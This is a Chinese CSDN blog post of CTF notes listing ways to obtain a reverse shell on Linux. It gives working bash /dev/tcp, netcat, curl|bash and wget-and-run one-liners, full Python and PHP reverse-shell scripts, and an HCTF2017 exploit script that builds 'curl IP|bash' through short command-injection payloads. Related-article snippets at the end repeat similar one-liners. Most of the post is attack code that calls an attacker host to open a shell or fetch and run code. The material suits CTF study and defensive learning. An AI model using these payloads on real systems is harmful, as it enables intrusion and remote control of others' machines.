Linux下几种常见的反弹shell的方式

最新推荐文章于 2024-08-08 21:06:47 发布
最新推荐文章于 2024-08-08 21:06:47 发布
阅读量1.8k 收藏 11
点赞数 2
分类专栏: web安全 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41107295/article/details/113245878
版权

time:2019-04-11 21:07

最近在做ctf题时碰到一些命令执行题借用命令执行来反弹shell,这里记录一下。

1.bash反弹shell

个人感觉bash反弹是最简单、也是最常见的一种。

bash -i >& /dev/tcp/192.168.20.151/8080 0>&1

bash一句话命令详解
以下针对常用的bash反弹一句话进行了拆分说明,具体内容如下。
image.png
其实以上bash反弹一句完整的解读过程就是:

bash产生了一个交互环境与本地主机主动发起与目标主机8080端口建立的连接(即TCP 8080 会话连接)相结合,然后在重定向个tcp 8080会话连接,最后将用户键盘输入与用户标准输出相结合再次重定向给一个标准的输出,即得到一个bash 反弹环境。
在反弹shell时要借助netcat工具反弹

Netcat 一句话反弹:Netcat反弹也是非常常用的方法,只是这个方法需要我们手动去安装一个NC环境

开启外网主机监听

root@kali:~# nc -lvvp 8080
listening on [any] 8080 ...

kali : 192.168.20.151
centos:192.168.20.130

先用kali开启监听:
然后centos执行bash一句话。
image.png

image.png

成功反弹。

2.netcat 一句话反弹

~  nc 192.168.31.151 7777 -t  /bin/bash
 命令详解:通过webshell我们可以使用nc命令直接建立一个tcp 8080 的会话连接,然后将本地的bash通过这个会话连接反弹给目标主机(192.168.31.151)。

先开启监听7777端口。
image.png

image.png

image.png
交互式反弹

3.curl反弹shell

前提要利用bash一句话的情况下使用curl反弹shell

在存在命令执行的服务器上执行curl ip|bash,该ip的index文件上含有bash一句话,就可以反弹shell。

例如在自己的服务器index上写上一句话

bash -i >& /dev/tcp/192.168.20.151/7777 0>&1

192.168.20.151就是作为监听端口的服务器用来得到反弹的shell。
image.png

存在一句话,利用curl反弹。
kali开启监听
image.png

image.png

4.wget方式反弹

利用wget进行下载执行

wget 192.168.20.130/shell.txt -O /tmp/x.php && php /tmp/x.php

利用下面贴出的php进行反弹。
开启监听
image.png

image.png
成功反弹shell

5.其他脚本反弹

python反弹

开启kail监听
image.png

image.png

反弹成功。
py脚本

#!/usr/bin/python
#-*- coding: utf-8 -*-
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.20.151",7777)) #更改localhost为自己的外网ip,端口任意
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

php反弹

开启kail监听端口,
image.png

image.png

成功反弹,不过这里要将php保存成txt文件进行反弹,若为php文件不会反弹成功。
php脚本:

<?php
$sock=fsockopen("192.168.20.151",7777);//localhost为自己的外网ip,端口任意
exec("/bin/sh -i <&3 >&3 2>&3");
?>

ctf遇到的命令执行反弹shell

####HCTF2017的一道
image.png

这道题大概意思就是存在命令执行,但单次输入字符不得大于5。因此利用linux下特有的命令来写入shell反弹。原理就是利用curl ip|bash等很多方式去反弹shell。网上很多教程具体就不说了。

import requests
from time import sleep
from urllib.parse import quote
payload = [
    # generate `ls -t>g` file
    '>ls\\', 
    'ls>_', 
    '>\ \\', 
    '>-t\\', 
    '>\>g', 
    'ls>>_', 

    # generate `curl orange.tw.tw|python`
    # generate `curl 10.188.2.20|bash` 
    '>sh\ ', 
    '>ba\\', 
    '>\|\\',
    # '>03\\',
    # '>90\\',
    '>0\\',
    '>20\\',
    '>1.\\',
    '>12\\' ,
    '>7.\\',
    '>10\\' ,
    '>9.\\', 
    '>3\\', 
    '>\ \\', 
    '>rl\\', 
    '>cu\\',
    
    #exec
    'sh _', 
    'sh g', 
]


r = requests.get('http://120.79.33.253:9003/?reset=1')
for i in payload:
    assert len(i) <= 5 
    r = requests.get('http://120.79.33.253:9003/?cmd=' + quote(i) )
    print (i)
    sleep(0.2)

在自己服务器中放入bash一句话,利用curl ip|bash反弹shell
开启监听,执行后可反弹shell。
image.png

利用linux文件写入技巧得到
image.png

ls -t >g是倒序输出文件名字,然后sh _执行此文件,写入到g中
image.png

可以看到该文件有curl xx.x.x.x|bash字符,在linux下输入任意一个字符后加\是不会中断当前操作,可以继续输入内容。而后面没有\则会中断,而sh可以在报错的情况下依然会执行可以执行的命令,因此不会影响curl的执行。

BerL1n
关注
  • 2
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Linux几种反弹Shell方法的总结与理解
墨痕诉清风的博客
01-09 2496
实验环境 CentOS 6.5:192.168.0.3 kali2.0:192.168.0.4 方法1: 反弹shell命令如下: bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1 首先,使用nc在kali上监听端口: nc -lvp 7777 然后在CentOS6.5下输入: bash -i &gt;&amp; /de...
linux几种shell反弹
m0_64343941的博客
11-26 103
一、 basn反弹 开启监听端口,被攻击者ip为攻击者的。kali为攻击者。 nc -lvvp 10000 bash -i >& /dev/tcp/192.168.96.133/10000 0>&1 nc反弹 nc -e /bin/bash 192.168.96.133 10000 虽然没有输入框,但其实已经反弹成功, python反弹,需要有python环境。 nc -lvvp 10000 ...
内网渗透之Linux反弹shell(综合)
墨鱼菜鸡
09-10 1379
目录 知识点 Linux mkfifo命令基本用法 1.首先了解linux命令执行顺序 2.然后了解下管道命令(pipe) 3.常见管道命令 4.mkfifo则可以创建命名管道 Linux标准文件描述符 更改标准输出的位置 更改标准输入的位置 /dev/null 重定向 输入重定向 输出重定向 管道 环境 01NC正向Sh...
shell脚本提取curl的返回值_kangle web server 面板 提权获取反弹shell
weixin_39995297的博客
12-08 469
上周遇到一个项目,通过扫描获得了一个 kang web service面板的权限。如图:这个面板功能比较简陋,想要进行下一步的话,必须要想办法getshell。搜索引擎上找了一下,基本上都是几年前的信息了,作用不大。只能自己想办法getshell了。经过仔细审计各项功能以后,发现了几个可能突破的点。2.可自定义htaccess文件以上两个办法都需要能够上传文件才能进行,后来经过研究可以不需要上传文...
常见 反弹shell的方法
最新发布
qq_48368964的博客
08-08 1329
nc x.x.x.x 4444|/bin/bash|nc x.x.x.x 5555 #从4444端口获取到命令,bash 运行后将命令执行结果返回 5555 端口,攻击者主机上也是打开两个终端分别执行监听。#/dev/tcp/x.x.x.x/port 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口。反弹shell成功后,在监听4444端口的终端中执行命令可以在另一个终端中看到命令执行结果。监听两个端口分别用来输入和输出,其中x.x.x.x均为攻击者ip。
shell反弹几种方式
nextdoor6的博客
05-16 5870
直接利用linux上的bash进行反弹 nc本地监听 nc -l -p port -vv base反弹 bash -i >& /dev/tcp/ownip/port 0>&1 利用其他服务器运行环境反弹,比如php,python等。 nc本地监听nc -l -p port -vvv php -r '$sock=fsockopen("10.0.0.1",1234);exec
反弹shell详细易懂讲解,看这一篇就够了
LCW991207的博客
05-26 1695
bash就是shell的众多小弟中的一个,Shell 是操作系统中提供用户与内核之间交互的一种界面,一个 解释型的程序设计语言,它的小弟有很多,它既可以是图形用户界面(GUI),也可以是命令行界面(CLI)。Shell 主要用于接受用户输入的命令并将其传递给操作系统的内核执行,同时将内核的输出结果返回给用户。
【转】反弹Shell,看这一篇就够了
热门推荐
mastergu2的博客
10-26 2万+
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
mysql 反弹shell_Linux几种反弹Shell方法的总结与理解
weixin_39929465的博客
01-27 1408
*本文原创作者:LlawLiet,本文属FreeBuf原创奖励计划,未经许可禁止转载。之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上...
经验分享 | 常用linux反弹shell合集
Uguardsec的博客
01-25 960
一、前言 当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句 来达到我们的目的。 二、反弹方法 攻击机:192.168.3.43 靶机:192.168.1.21 、192.168.249.12 1. Bash反弹 1.1 方法一 攻击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i >& /dev/tcp/x.x.x.x/port 0
linux反弹shell的原理浅析
黑锤的博客
08-14 776
反弹shell文件描述符与重定向 在这里最难理解的就是文件描述符和重定向这两部分 先来讲一下linux的文件描述符,什么是文件描述符, 在linux系统中将所有设备都当做文件来处理,而linux文件描述符用来标识每个文件对象,在我理解中就是描述符用来指定对象的,这样才能井然有序的运行。在linux系统中就连输入设备和输出设备都被当成是文件来处理就拿显示器和键盘输入都拿来当成文件处理,他们都有...
反弹Shell,看这一篇就够了
Appleteachers的博客
04-24 1219
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
反弹shell的方法总结(base64绕过等等)
weixin_50464560的博客
04-01 9278
前言 什么是反弹shell(reverse shell)? 就是控制端监听某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么需要反弹shell反弹shell通常用于被控端因防火墙受限、权限不足、端口被占用等情形。在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。以下详细介绍Win
使用本机反弹shell
meteox的博客
09-04 646
有时候做题时懒得开服务器,或者服务器有问题用不了,都可以用本机做下内网穿透来进行反弹shell,或者得到一个公网可访问的web页面 我一般用natapp,使用起来比较简单方便 注册完成后配置下隧道本地要映射的端口 http隧道一般本地端口就设置为80,到时候本地开启phpstudy就可以直接使用。 tcp隧道根据你要监听的端口进行设置。 我这里tcp隧道的本地端口设置为1516。 下载它的客户端后直接在终端中执行命令 ./natapp -authtoken=你的authtoken 可以得到映射后的地址和端
linux反弹shell 漏洞,利用wget漏洞(CVE-2014-4877)反弹shell
weixin_32306885的博客
05-17 627
28日,linux操作系统的wget被发现安全漏洞,当用户通过wget命令递归下载文件时,攻击者可通过构造恶意的符号链接文件触发该漏洞,从而在wget用户的系统中创建任意文件、目录或符号链接并设置访问权限。攻防实验室的小伙伴们在当天就对漏洞进行了分析验证。不久后国外的安全研究者已经能通过此漏洞反弹交互式的shell,利用的是linux的计划任务。Metasploit也更新了相应的模块,下面我们一起...
反弹shell学习(一):基础反弹姿势
E1even的博客
07-25 2129
文章目录bash反弹:nc反弹:-e被阉割的情况:nc -e:利用Telnet反弹shell方法1:方法2:python脚本反弹:PHP反弹shell总结: bash反弹: 这是最常见也是最简单的一种反弹shell方式,直接看命令: 攻击机:nc -lvp 2333 受害机:bash -i >& /dev/tcp/192.168.28.133/2333 0>&1 攻击机: 受害机: 最后攻击机达成的效果: 可以命令执行,再实际中不可能获取的是root权限,所以成功反弹s
反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载
zrx9988的博客
05-15 442
所谓的正向连接以及反向连接都是需要根据参照物来进行确认的,所举的例子均是以Linux外网服务器为参照;当存在命令注入漏洞时,就需要使用连接符,将上述命令进行拼接执行。反向连接就是我把我的IP与端口号交出去,等待别人来控制我;正向连接就是主动出击,去控制别的服务器;示例:(Windows控制Linux)Linux控制Windows。Windows控制Linux。外网去控制内网的主机。
反弹shell汇总(超详细)
qq_52173020的博客
05-27 9024
反弹shell姿势大全,看这一篇就够啦~
常用反弹 shell 方式总结
未完成的歌~的博客
03-07 5752
反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

BerL1n

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值